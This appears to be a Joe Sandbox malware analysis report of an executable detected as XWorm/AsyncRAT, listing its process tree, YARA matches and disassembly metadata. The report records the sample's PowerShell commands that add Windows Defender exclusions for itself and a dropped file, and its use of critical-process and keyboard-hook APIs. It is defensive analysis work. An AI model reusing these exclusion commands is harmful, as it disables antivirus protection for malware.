                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:22:49:57
                                          Start date:06/10/2024
                                          Path:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\1c8DbXc5r0.exe"
                                          Imagebase:0x8d0000
                                          File size:39'424 bytes
                                          MD5 hash:49AA60A3EE7D3B03D16AA591024CBBC7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:1
                                          Start time:22:50:00
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:22:50:00
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:22:50:07
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:22:50:07
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:22:50:16
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:22:50:16
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:22:50:30
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:22:50:30
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:19.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 6332 7ffd9b8836ed 6333 7ffd9b88371f RtlSetProcessIsCritical 6332->6333 6335 7ffd9b8837d2 6333->6335 6336 7ffd9b883c18 6337 7ffd9b883c21 SetWindowsHookExW 6336->6337 6339 7ffd9b883cf1 6337->6339

                                            Executed Functions

                                            Function 00007FFD9B883F28 Relevance: 2.4, Strings: 1, Instructions: 1168COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 7ffd9b883f28-7ffd9b88cea3 2 7ffd9b88cea5-7ffd9b88ceb0 call 7ffd9b8805e8 0->2 3 7ffd9b88ceed-7ffd9b88cef5 0->3 7 7ffd9b88ceb5-7ffd9b88ceec 2->7 4 7ffd9b88cef7-7ffd9b88cf14 3->4 5 7ffd9b88cf6b 3->5 8 7ffd9b88cf70-7ffd9b88cf85 4->8 11 7ffd9b88cf16-7ffd9b88cf66 call 7ffd9b88ac30 4->11 5->8 7->3 14 7ffd9b88cf87-7ffd9b88cf9e call 7ffd9b8807d8 call 7ffd9b8805f8 8->14 15 7ffd9b88cfa3-7ffd9b88cfb8 8->15 36 7ffd9b88dbab-7ffd9b88dbb9 11->36 14->36 22 7ffd9b88cfba-7ffd9b88cfea call 7ffd9b8807d8 15->22 23 7ffd9b88cfef-7ffd9b88d004 15->23 22->36 31 7ffd9b88d006-7ffd9b88d012 call 7ffd9b88c4a8 23->31 32 7ffd9b88d017-7ffd9b88d02c 23->32 31->36 41 7ffd9b88d02e-7ffd9b88d031 32->41 42 7ffd9b88d072-7ffd9b88d087 32->42 41->5 44 7ffd9b88d037-7ffd9b88d042 41->44 48 7ffd9b88d0c8-7ffd9b88d0dd 42->48 49 7ffd9b88d089-7ffd9b88d08c 42->49 44->5 46 7ffd9b88d048-7ffd9b88d06d call 7ffd9b8805d0 call 7ffd9b88c4a8 44->46 46->36 56 7ffd9b88d10a-7ffd9b88d11f 48->56 57 7ffd9b88d0df-7ffd9b88d0e2 48->57 49->5 50 7ffd9b88d092-7ffd9b88d09d 49->50 50->5 52 7ffd9b88d0a3-7ffd9b88d0c3 call 7ffd9b8805d0 call 7ffd9b883f78 50->52 52->36 66 7ffd9b88d125-7ffd9b88d171 call 7ffd9b880558 56->66 67 7ffd9b88d1f7-7ffd9b88d20c 56->67 57->5 60 7ffd9b88d0e8-7ffd9b88d105 call 7ffd9b8805d0 call 7ffd9b883f80 57->60 60->36 66->5 100 7ffd9b88d177-7ffd9b88d19b 66->100 75 7ffd9b88d22b-7ffd9b88d240 67->75 76 7ffd9b88d20e-7ffd9b88d211 67->76 83 7ffd9b88d262-7ffd9b88d277 75->83 84 7ffd9b88d242-7ffd9b88d245 75->84 76->5 77 7ffd9b88d217-7ffd9b88d226 call 7ffd9b883f58 76->77 77->36 91 7ffd9b88d297-7ffd9b88d2ac 83->91 92 7ffd9b88d279-7ffd9b88d292 83->92 84->5 86 7ffd9b88d24b-7ffd9b88d25d call 7ffd9b883f58 84->86 86->36 97 7ffd9b88d2cc-7ffd9b88d2e1 91->97 98 7ffd9b88d2ae-7ffd9b88d2c7 91->98 92->36 104 7ffd9b88d301-7ffd9b88d316 97->104 105 7ffd9b88d2e3-7ffd9b88d2fc 97->105 98->36 100->67 110 7ffd9b88d318-7ffd9b88d31b 104->110 111 7ffd9b88d33f-7ffd9b88d354 104->111 105->36 110->5 112 7ffd9b88d321-7ffd9b88d33a 110->112 115 7ffd9b88d35a-7ffd9b88d3d2 111->115 116 7ffd9b88d3f4-7ffd9b88d409 111->116 112->36 115->5 139 7ffd9b88d3d8-7ffd9b88d3ef 115->139 119 7ffd9b88d40b-7ffd9b88d41c 116->119 120 7ffd9b88d421-7ffd9b88d436 116->120 119->36 126 7ffd9b88d4d6-7ffd9b88d4eb 120->126 127 7ffd9b88d43c-7ffd9b88d4b4 120->127 131 7ffd9b88d4ed-7ffd9b88d4fe 126->131 132 7ffd9b88d503-7ffd9b88d518 126->132 127->5 158 7ffd9b88d4ba-7ffd9b88d4d1 127->158 131->36 141 7ffd9b88d54a-7ffd9b88d55f 132->141 142 7ffd9b88d51a-7ffd9b88d545 call 7ffd9b880ae0 call 7ffd9b88ac30 132->142 139->36 148 7ffd9b88d565-7ffd9b88d637 call 7ffd9b880ae0 call 7ffd9b88ac30 141->148 149 7ffd9b88d63c-7ffd9b88d651 141->149 142->36 148->36 156 7ffd9b88d657-7ffd9b88d65a 149->156 157 7ffd9b88d718-7ffd9b88d72d 149->157 160 7ffd9b88d70d-7ffd9b88d712 156->160 161 7ffd9b88d660-7ffd9b88d66b 156->161 167 7ffd9b88d72f-7ffd9b88d73c call 7ffd9b88ac30 157->167 168 7ffd9b88d741-7ffd9b88d756 157->168 158->36 173 7ffd9b88d713 160->173 161->160 163 7ffd9b88d671-7ffd9b88d70b call 7ffd9b880ae0 call 7ffd9b88ac30 161->163 163->173 167->36 177 7ffd9b88d758-7ffd9b88d769 168->177 178 7ffd9b88d7cd-7ffd9b88d7e2 168->178 173->36 177->5 184 7ffd9b88d76f-7ffd9b88d77f call 7ffd9b8805c8 177->184 186 7ffd9b88d822-7ffd9b88d837 178->186 187 7ffd9b88d7e4-7ffd9b88d7e7 178->187 197 7ffd9b88d7ab-7ffd9b88d7c8 call 7ffd9b8805c8 call 7ffd9b8805d0 call 7ffd9b883f30 184->197 198 7ffd9b88d781-7ffd9b88d7a6 call 7ffd9b88ac30 184->198 195 7ffd9b88d839-7ffd9b88d878 call 7ffd9b88a8f0 call 7ffd9b88a2d0 call 7ffd9b883f38 186->195 196 7ffd9b88d87d-7ffd9b88d892 186->196 187->5 190 7ffd9b88d7ed-7ffd9b88d81d call 7ffd9b8805c0 call 7ffd9b8805d0 call 7ffd9b883f30 187->190 190->36 195->36 214 7ffd9b88d898-7ffd9b88d92d call 7ffd9b880ae0 call 7ffd9b88ac30 196->214 215 7ffd9b88d932-7ffd9b88d947 196->215 197->36 198->36 214->36 215->36 233 7ffd9b88d94d-7ffd9b88d954 215->233 236 7ffd9b88d956-7ffd9b88d960 call 7ffd9b88c4c8 233->236 237 7ffd9b88d967-7ffd9b88da81 call 7ffd9b88c4d8 call 7ffd9b88c4e8 call 7ffd9b88c4f8 call 7ffd9b88c508 call 7ffd9b882788 call 7ffd9b88c518 call 7ffd9b88c4e8 call 7ffd9b88c4f8 233->237 236->237 284 7ffd9b88daf2-7ffd9b88db01 237->284 285 7ffd9b88da83-7ffd9b88da87 237->285 286 7ffd9b88db08-7ffd9b88dbaa call 7ffd9b880ae0 call 7ffd9b8805d8 call 7ffd9b88ac30 284->286 285->286 287 7ffd9b88da89-7ffd9b88dae8 call 7ffd9b88c528 call 7ffd9b88c538 285->287 286->36 287->284
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 83f0102cf19333d6d41f15b1cb0a0a6d46bed5fa315c001b805348696e78ea90
                                            • Instruction ID: 42baef55bc51152026baaf8145967f901dcef2062a24cfae1429b5b6dd5eb513
                                            • Opcode Fuzzy Hash: 83f0102cf19333d6d41f15b1cb0a0a6d46bed5fa315c001b805348696e78ea90
                                            • Instruction Fuzzy Hash: 98828220B1D91E4BEBA8FBA88465AB972D2FF98704F514579D02EC32D7DD38EC428741
                                            Function 00007FFD9B8805B8 Relevance: 1.9, Strings: 1, Instructions: 628COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAO_^
                                            • API String ID: 0-3111533842
                                            • Opcode ID: 270cdd523515708f39f5dbbdb8458d85fb5c4092357b10cc6d144693b7e44e25
                                            • Instruction ID: 2df71c0836f7fbbe41eb9f2d588b590aea6e821b19b0b781260f37b5c3c7a1c0
                                            • Opcode Fuzzy Hash: 270cdd523515708f39f5dbbdb8458d85fb5c4092357b10cc6d144693b7e44e25
                                            • Instruction Fuzzy Hash: D112E730B2DA094FE7A8FB7C886967976D2EF9C714F450579E41EC32D6DE38A8418341
                                            Function 00007FFD9B8880A6 Relevance: .5, Instructions: 472COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 748 7ffd9b8880a6-7ffd9b8880b3 749 7ffd9b8880b5-7ffd9b8880bd 748->749 750 7ffd9b8880be-7ffd9b888187 748->750 749->750 754 7ffd9b888189-7ffd9b888192 750->754 755 7ffd9b8881f3 750->755 754->755 756 7ffd9b888194-7ffd9b8881a0 754->756 757 7ffd9b8881f5-7ffd9b88821a 755->757 758 7ffd9b8881d9-7ffd9b8881f1 756->758 759 7ffd9b8881a2-7ffd9b8881b4 756->759 764 7ffd9b888286 757->764 765 7ffd9b88821c-7ffd9b888225 757->765 758->757 760 7ffd9b8881b6 759->760 761 7ffd9b8881b8-7ffd9b8881cb 759->761 760->761 761->761 763 7ffd9b8881cd-7ffd9b8881d5 761->763 763->758 767 7ffd9b888288-7ffd9b888330 764->767 765->764 766 7ffd9b888227-7ffd9b888233 765->766 768 7ffd9b888235-7ffd9b888247 766->768 769 7ffd9b88826c-7ffd9b888284 766->769 778 7ffd9b88839e 767->778 779 7ffd9b888332-7ffd9b88833c 767->779 770 7ffd9b888249 768->770 771 7ffd9b88824b-7ffd9b88825e 768->771 769->767 770->771 771->771 773 7ffd9b888260-7ffd9b888268 771->773 773->769 781 7ffd9b8883a0-7ffd9b8883c9 778->781 779->778 780 7ffd9b88833e-7ffd9b88834b 779->780 782 7ffd9b88834d-7ffd9b88835f 780->782 783 7ffd9b888384-7ffd9b88839c 780->783 788 7ffd9b8883cb-7ffd9b8883d6 781->788 789 7ffd9b888433 781->789 784 7ffd9b888361 782->784 785 7ffd9b888363-7ffd9b888376 782->785 783->781 784->785 785->785 787 7ffd9b888378-7ffd9b888380 785->787 787->783 788->789 791 7ffd9b8883d8-7ffd9b8883e6 788->791 790 7ffd9b888435-7ffd9b8884c6 789->790 799 7ffd9b8884cc-7ffd9b8884db 790->799 792 7ffd9b8883e8-7ffd9b8883fa 791->792 793 7ffd9b88841f-7ffd9b888431 791->793 795 7ffd9b8883fc 792->795 796 7ffd9b8883fe-7ffd9b888411 792->796 793->790 795->796 796->796 797 7ffd9b888413-7ffd9b88841b 796->797 797->793 800 7ffd9b8884dd 799->800 801 7ffd9b8884e3-7ffd9b888548 call 7ffd9b888564 799->801 800->801 808 7ffd9b88854a 801->808 809 7ffd9b88854f-7ffd9b888563 801->809 808->809
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f839def58c29df77174eba96530f805d3b21d7b82263498b162aae956018a16
                                            • Instruction ID: cef5e98b1a1243586ebe56b1c1f2920123188bbc7feaad29c0730345d9800ea8
                                            • Opcode Fuzzy Hash: 1f839def58c29df77174eba96530f805d3b21d7b82263498b162aae956018a16
                                            • Instruction Fuzzy Hash: 6AF1A330A09E4E8FEBA8DF28C8557E977D1FF58310F14426EE85DC7295DB34A9418B82
                                            Function 00007FFD9B888E52 Relevance: .5, Instructions: 458COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 810 7ffd9b888e52-7ffd9b888e5f 811 7ffd9b888e6a-7ffd9b888f37 810->811 812 7ffd9b888e61-7ffd9b888e69 810->812 816 7ffd9b888f39-7ffd9b888f42 811->816 817 7ffd9b888fa3 811->817 812->811 816->817 819 7ffd9b888f44-7ffd9b888f50 816->819 818 7ffd9b888fa5-7ffd9b888fca 817->818 826 7ffd9b889036 818->826 827 7ffd9b888fcc-7ffd9b888fd5 818->827 820 7ffd9b888f89-7ffd9b888fa1 819->820 821 7ffd9b888f52-7ffd9b888f64 819->821 820->818 823 7ffd9b888f66 821->823 824 7ffd9b888f68-7ffd9b888f7b 821->824 823->824 824->824 825 7ffd9b888f7d-7ffd9b888f85 824->825 825->820 829 7ffd9b889038-7ffd9b88905d 826->829 827->826 828 7ffd9b888fd7-7ffd9b888fe3 827->828 830 7ffd9b888fe5-7ffd9b888ff7 828->830 831 7ffd9b88901c-7ffd9b889034 828->831 835 7ffd9b8890cb 829->835 836 7ffd9b88905f-7ffd9b889069 829->836 833 7ffd9b888ff9 830->833 834 7ffd9b888ffb-7ffd9b88900e 830->834 831->829 833->834 834->834 837 7ffd9b889010-7ffd9b889018 834->837 839 7ffd9b8890cd-7ffd9b8890fb 835->839 836->835 838 7ffd9b88906b-7ffd9b889078 836->838 837->831 840 7ffd9b88907a-7ffd9b88908c 838->840 841 7ffd9b8890b1-7ffd9b8890c9 838->841 846 7ffd9b88916b 839->846 847 7ffd9b8890fd-7ffd9b889108 839->847 842 7ffd9b88908e 840->842 843 7ffd9b889090-7ffd9b8890a3 840->843 841->839 842->843 843->843 845 7ffd9b8890a5-7ffd9b8890ad 843->845 845->841 848 7ffd9b88916d-7ffd9b889245 846->848 847->846 849 7ffd9b88910a-7ffd9b889118 847->849 859 7ffd9b88924b-7ffd9b88925a 848->859 850 7ffd9b88911a-7ffd9b88912c 849->850 851 7ffd9b889151-7ffd9b889169 849->851 852 7ffd9b88912e 850->852 853 7ffd9b889130-7ffd9b889143 850->853 851->848 852->853 853->853 855 7ffd9b889145-7ffd9b88914d 853->855 855->851 860 7ffd9b88925c 859->860 861 7ffd9b889262-7ffd9b8892c4 call 7ffd9b8892e0 859->861 860->861 868 7ffd9b8892c6 861->868 869 7ffd9b8892cb-7ffd9b8892df 861->869 868->869
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7012afe59fa6a96d138ce410610c7201eab09f97a753d3ab92b4df3143111d30
                                            • Instruction ID: 5de8071c371f2c8b3acf46c715a67981e1d365efa6941c180ee570bab198a3ca
                                            • Opcode Fuzzy Hash: 7012afe59fa6a96d138ce410610c7201eab09f97a753d3ab92b4df3143111d30
                                            • Instruction Fuzzy Hash: A6E1C430A0DE4E8FEBA8DF28C8657E977D1EF58310F14426ED85DC7295DE38A9418B81
                                            Function 00007FFD9B8836ED Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 447 7ffd9b8836ed-7ffd9b8837d0 RtlSetProcessIsCritical 451 7ffd9b8837d2 447->451 452 7ffd9b8837d8-7ffd9b88380d 447->452 451->452
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 75b7f4bf2435d7a843dbf739536fce874304201d640e90c915f6836c4f69418f
                                            • Instruction ID: db7cae302d6915b5bbd3b90d9231e4c39e23f026f6b822c5fc7be7a194b58c49
                                            • Opcode Fuzzy Hash: 75b7f4bf2435d7a843dbf739536fce874304201d640e90c915f6836c4f69418f
                                            • Instruction Fuzzy Hash: 3E41F23190C6488FDB19DFA8D855AE9BBF0EF5A311F04416EE09AC3592CB74A846CB91
                                            Function 00007FFD9B883C18 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 454 7ffd9b883c18-7ffd9b883c1f 455 7ffd9b883c21-7ffd9b883c29 454->455 456 7ffd9b883c2a-7ffd9b883c9d 454->456 455->456 460 7ffd9b883ca3-7ffd9b883cb0 456->460 461 7ffd9b883d29-7ffd9b883d2d 456->461 462 7ffd9b883cb2-7ffd9b883cef SetWindowsHookExW 460->462 461->462 464 7ffd9b883cf1 462->464 465 7ffd9b883cf7-7ffd9b883d28 462->465 464->465
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: a4518096efc9fbe4123936f983591781c10e65df4bb7ad6f0a15d27313c04662
                                            • Instruction ID: 23969a83b8568444f9279204753558591156d34a4c75f27ba4a05b3c6f7c31f8
                                            • Opcode Fuzzy Hash: a4518096efc9fbe4123936f983591781c10e65df4bb7ad6f0a15d27313c04662
                                            • Instruction Fuzzy Hash: 5741F630A0CA5D8FDB5CDF6C98566F9BBE1EF59321F00027EE019D3292DE74A8528781

                                            Executed Functions

                                            Function 00007FFD9B976605 Relevance: .4, Instructions: 440COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c347f3aec162f2ccd526f0d17f309894dc4aef1fc1246160a297e2e2b2319e77
                                            • Instruction ID: d2531fdc3543b0d81c1feabfb73cbced4a513ec6941173761eadd8c040d69b08
                                            • Opcode Fuzzy Hash: c347f3aec162f2ccd526f0d17f309894dc4aef1fc1246160a297e2e2b2319e77
                                            • Instruction Fuzzy Hash: E9D14732A1FB8D2FEB65EBA848A55B57BE1EF56310B0901FED45CC70E3D918A905C341
                                            Function 00007FFD9B8A9EF3 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32be23b6dc6bebcec90c6c1ced66e155f55b2a4323d557b6a529c957a36b2ffe
                                            • Instruction ID: 6b9655508a1ad72153d6b700aee77608677220579115bcf159361336a9bfc8de
                                            • Opcode Fuzzy Hash: 32be23b6dc6bebcec90c6c1ced66e155f55b2a4323d557b6a529c957a36b2ffe
                                            • Instruction Fuzzy Hash: 4071B163F0FA9A5BE7156BADEC7A0E83760EF11768F0901B3C4D84B0A3FD1425174691
                                            Function 00007FFD9B8A9738 Relevance: .1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d8b14e435aad75243bcffdfbed94a59f1fbb99f9e98fc5f77d6d3bb908eda61
                                            • Instruction ID: 2d2fe8915815afe2ee041bd2e66abe5e7ba112c3ae25a596bff4038ea8200378
                                            • Opcode Fuzzy Hash: 8d8b14e435aad75243bcffdfbed94a59f1fbb99f9e98fc5f77d6d3bb908eda61
                                            • Instruction Fuzzy Hash: 14410871A0DA488FDF589F5C984A6A87BE1FB98310F04812FE449C3292DB30B955CBC2
                                            Function 00007FFD9B78E384 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760057812.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b78d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a524793753baba04c3422a58d7c2b43aa4d3d039fdcbdc0aeaa3dd6be60694e6
                                            • Instruction ID: 087fc7f02fe012a22155c8249fabc510754d641bd48d39b6e48a7113302f5537
                                            • Opcode Fuzzy Hash: a524793753baba04c3422a58d7c2b43aa4d3d039fdcbdc0aeaa3dd6be60694e6
                                            • Instruction Fuzzy Hash: BC41127040EBC84FE7668B2898919523FF0EF52321B1606EFD088CB1B3D725A846C792
                                            Function 00007FFD9B8AA47C Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3181a80cdfa23f5e99ad50e558da003caa425f026b529f602ebb8926643d5fa
                                            • Instruction ID: fdf6291d84aef1aae81012d305398eab3741c6cc7b09049e918e915166eabc83
                                            • Opcode Fuzzy Hash: b3181a80cdfa23f5e99ad50e558da003caa425f026b529f602ebb8926643d5fa
                                            • Instruction Fuzzy Hash: D6210A3190C74C8FDB59DFAC984A7E97FF0EB9A321F04416BD448C3166DA74941ACB91
                                            Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                            Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
